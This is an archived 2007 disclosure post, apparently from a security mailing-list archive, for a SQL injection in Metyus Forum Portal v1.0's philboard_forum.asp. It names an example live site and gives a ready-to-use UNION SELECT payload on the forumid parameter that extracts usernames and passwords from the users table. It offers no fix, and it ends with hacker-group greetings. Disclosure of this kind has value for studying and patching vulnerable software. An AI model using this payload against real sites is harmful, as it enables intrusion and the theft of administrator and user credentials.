Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[Full-disclosure] WordPress wp-feedstats persistent XSS

sBlog 0.7.3 Beta  XSS Vulnerabilitie

PHPSysInfo Index.php Cross Site Scripting

SolpotCrew Advisory #14 (S4M3K) - PhpHostBot (login_form) Remote File Inclusion

From:	crazy_king_(at)_eno7.org <crazy_king_(at)_eno7.org>
Date:	27.07.2007
Subject:	Metyus Forum Portal v1.0

# Bug Names : Metyus Forum Portal v1.0 philboard_forum.asp (id) Sql İnjection

# script name : Metyus Forum Portal

# For Example Page : http://users1.nofeehost.com/canavartepe/forum/philboard.asp

# Version : 1.0

# Risk : High

# Download : http://aspindir.com/indir.asp?id=3889

# Found By : Cr@zy_King

# Thanks : Eno7 | TamTurk | Th3_B3KiR | Bolivar | ApAci | BlackWolf | Crackers_Child | TheHacker |

# Web Folder : philboard_forum.asp

# Vuln : ?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,
14,15,16,17,18,19,20+%20from+users

# Admin Name & Password

# Contact: crazy_king[at]eno7[dot]org

# ---------------------------TurkForces.Com & TurkForces.Com & TurkForces.Com & TurkForces.Com & TurkForces.Com & TurkForces.Com & TurkForces.Com & TurkForces.Com--------------------------